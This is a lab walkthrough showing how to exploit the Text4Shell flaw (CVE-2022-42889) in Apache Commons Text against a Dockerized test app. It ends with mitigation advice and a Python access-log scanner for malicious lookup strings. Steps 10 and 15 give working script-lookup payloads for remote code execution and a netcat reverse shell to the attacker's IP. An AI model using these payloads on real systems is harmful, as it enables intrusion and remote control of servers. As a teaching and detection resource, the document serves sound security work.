Exploiting ‘Text4Shell’ vulnerability (CVE-2022-42889)
Summary
This article shows how an attacker could exploit the Text4Shell vulnerability (CVE-2022-42889). For this purpose we will use U. J. Karthik’s PoC application text4shell-poc.jar.
Disclaimer
This article is for informational and educational purposes only, and for those who’re willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you’re ready to learn something new for the good, then read on.
Details
The Text4Shell vulnerability was disclosed to Apache on 13th October 2022. Text4Shell affects Java products that use certain features of the Apache Commons Text library, and may allow remote attackers to execute arbitrary code on the server. For more information, see https://www.tarlogic.com/blog/cve-2022-42889-critical-vulnerability-affects-apache-commons-text/#CVE-2022-42889_Key_Features.
Vulnerable applications have the following characteristics:
- They use Apache Commons Text versions 1.5 to 1.9
- They use the library's string manipulation features on attacker-controlled input
In this PoC, we will use a Dockerized test application “text4shell-poc.jar”. This test application was created by U J Karthik, an ethical hacker / developer from Delhi (https://github.com/karthikuj).
The PoC setup consists of one Linux machine (our victim) and one attacker machine (Kali Linux 2022.3 release).
Victim (installation of text4shell-poc.jar)
- Ubuntu 20.04 (x64)
- IP address: 192.168.62.174
Attacker (for reverse shell)
- Kali Linux
- IP address: 192.168.62.161
The next sections include:
- Steps 1–3: Install requirements for vulnerable application
- Steps 4–8: Install the vulnerable application
- Steps 9–13: Perform Remote Code Execution on the vulnerable web application
- Steps 14–15: Set up a reverse shell to the attacker machine
- Mitigation
- Credits
Install requirements for vulnerable application
In order to get the vulnerable Java application up and running, we need to install OpenJDK, Maven and Docker.
1. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Install OpenJDK
sudo apt update && sudo apt install openjdk-11-jdk
2. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
We already have Docker installed; check with:
which docker
If you don’t have Docker:
sudo apt install docker.io containerd runc
3. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Install Maven in /opt
cd /tmp
wget https://mirrors.estointernet.in/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz
tar -xvf apache-maven-3.6.3-bin.tar.gz
sudo mv apache-maven-3.6.3 /opt/
Set the environment variables
M2_HOME='/opt/apache-maven-3.6.3'
PATH="$M2_HOME/bin:$PATH"
export PATH
Install the vulnerable application
4. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Download PoC application
cd /tmp
git clone https://github.com/karthikuj/cve-2022-42889-text4shell-docker.git
5. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Use Maven to build the application.
cd /tmp/cve-2022-42889-text4shell-docker/
mvn clean install
6. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Build the docker container for the vulnerable application.
docker build --tag=text4shell .
7. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Start a container from the image, mapping host port 80 to the application's port 8080.
docker run -p 80:8080 text4shell
8. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Test the application on the victim machine.
firefox http://localhost/text4shell/attack?search=blablabla
Perform Remote Code Execution on the vulnerable web application
Now, use the attacker machine for further exploitation.
9. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Test the application on our attacker machine.
firefox http://192.168.62.174/text4shell/attack?search=blablabla
10. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Now attack the remote web server by passing a string of the form “${prefix:name}”, which Commons Text interpolates as a lookup.
http://192.168.62.174/text4shell/attack?search=${script:javascript:java.lang.Runtime.getRuntime().exec'touch /tmp/foo')}
Important: the above string contains “.exec'touch”. This is not correct; it must be “.exec('touch”. Because of the Medium.com input validation, it was not possible to publish “.exec('touch”. Add the missing “(” manually.
URL-encode the above string (https://www.urlencoder.org/).
http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%27touch%20%2Ftmp%2Ffoo%27%29%7D
Important: the above string contains “.exec%27”. This is not correct; it must be “.exec%28%27”. Because of the Medium.com input validation, it was not possible to publish “.exec%28%27”. Add the missing “%28” manually.
11. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Get the docker container id
docker container ls
12. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Start a bash shell inside the docker container. Use docker exec -it <container_id> bash
docker exec -it 4bc32732e273 bash
13. Performed on 192.168.62.174 (victim machine, Ubuntu Linux).
Check if the RCE was successful. (You should see a file named foo created in the /tmp directory):
ls /tmp
The file ‘foo’ is there, so the RCE was successful.
Set up a reverse shell with the attacker machine
We are lucky to find netcat inside the application's Docker container. We can use that local netcat binary to set up a reverse shell.
14. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Set up a netcat listener.
rlwrap nc -nlvp 443
15. Performed on 192.168.62.161 (attacker machine, Kali Linux).
Construct the payload:
${script:javascript:java.lang.Runtime.getRuntime().exec'nc 192.168.62.161 443 -e /bin/bash')}
Important: the above string contains “.exec'nc”. This is not correct; it must be “.exec('nc”. Because of the Medium.com input validation, it was not possible to publish “.exec('nc”. Add the missing “(” manually.
The URL-encoded payload:
http://192.168.62.174/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%27nc%20192.168.62.161%20443%20-e%20%2Fbin%2Fbash%27%29%7D
Important: the above string contains “.exec%27”. This is not correct; it must be “.exec%28%27”. Because of the Medium.com input validation, it was not possible to publish “.exec%28%27”. Add the missing “%28” manually.
Now check the netcat listener on Kali; a shell from the victim's container should have connected.
Mitigation
Apache has released a patch in the form of a new version of the Commons Text library, version 1.10, which removes the code-executing and network-reaching lookups (script, dns, url) from the default interpolator. Installing this new version mitigates the vulnerability.
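Until the upgrade is rolled out, the request pattern used in steps 10 and 15 is easy to spot in web server access logs. The following Python snippet is an added example (not part of the original article or of the PoC project): it URL-decodes the query string of each log line, including double-encoded variants, and flags requests carrying one of the lookup prefixes that version 1.10 disabled. The log lines are constructed samples with inert lookup bodies.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Lookup prefixes that Commons Text 1.10.0 dropped from the default
# interpolator because they reach the network or execute code.
DANGEROUS_LOOKUPS = ("script", "dns", "url")
LOOKUP_RE = re.compile(r"\$\{\s*(" + "|".join(DANGEROUS_LOOKUPS) + r")\s*:", re.I)
TARGET_RE = re.compile(r'"(?:GET|POST|PUT|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(s, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def find_lookups(target):
    """Return the dangerous lookup prefixes found in any query parameter."""
    found = []
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for v in values:  # parse_qs decoded once; decode again for nested encoding
            found += [m.group(1).lower() for m in LOOKUP_RE.finditer(fully_unquote(v))]
    return sorted(set(found))

def scan_log(lines):
    """Return (line_number, prefixes) for each request carrying a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = TARGET_RE.search(line)
        if m and (prefixes := find_lookups(m.group(1))):
            hits.append((n, prefixes))
    return hits

# Constructed sample access-log lines, not real traffic. The lookup bodies
# are inert ("1+1") so the sample itself does nothing when interpolated.
SAMPLE_LOG = [
    '192.168.62.161 - - [17/Oct/2022:10:00:01 +0000] "GET /text4shell/attack?search=blablabla HTTP/1.1" 200 54',
    '192.168.62.161 - - [17/Oct/2022:10:00:02 +0000] "GET /text4shell/attack?search=%24%7Bscript%3Ajavascript%3A1%2B1%7D HTTP/1.1" 200 54',
    '192.168.62.161 - - [17/Oct/2022:10:00:03 +0000] "GET /text4shell/attack?search=%2524%257BSCRIPT%253Ajavascript%253A1%252B1%257D HTTP/1.1" 200 54',
    '192.168.62.161 - - [17/Oct/2022:10:00:04 +0000] "GET /text4shell/attack?search=%24%7Bdate%3Ayyyy%7D HTTP/1.1" 200 54',
]

if __name__ == "__main__":
    for n, prefixes in scan_log(SAMPLE_LOG):
        print(f"line {n}: Commons Text lookup {prefixes} in query string")
```

The harmless `${date:yyyy}` request on the last line is deliberately not flagged, so the rule keys on the risky prefixes rather than on every `${...}` expression.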
Credits
Special credits to U. J. Karthik for this PoC application (https://github.com/karthikuj).
Credits to those researchers that discovered this vulnerability and disclosed it first to Apache.